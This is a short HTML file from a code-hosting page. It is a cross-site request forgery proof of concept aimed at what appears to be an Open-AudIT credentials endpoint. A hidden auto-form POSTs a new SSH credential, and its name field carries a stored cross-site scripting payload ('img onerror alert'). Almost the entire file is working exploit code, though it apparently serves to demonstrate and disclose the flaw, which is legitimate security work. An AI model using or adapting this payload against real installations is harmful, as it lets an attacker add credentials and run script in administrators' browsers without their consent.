csrf.html 986 Bytes
Newer Older
Kilian Low's avatar
Kilian Low committed
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:3000/omk/open-audit/credentials" method="POST">
      <input type="hidden" name="data&#91;attributes&#93;&#91;name&#93;" value="<img src=x onerror=alert('hacked');>" />
      <input type="hidden" name="data&#91;attributes&#93;&#91;org&#95;id&#93;" value="1" />
      <input type="hidden" name="data&#91;attributes&#93;&#91;description&#93;" value="CSRF" />
      <input type="hidden" name="data&#91;attributes&#93;&#91;type&#93;" value="ssh" />
      <input type="hidden" name="data&#91;attributes&#93;&#91;credentials&#93;&#91;username&#93;" value="test" />
      <input type="hidden" name="data&#91;attributes&#93;&#91;credentials&#93;&#91;password&#93;" value="test" />
      <input type="hidden" name="data&#91;type&#93;" value="credentials" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>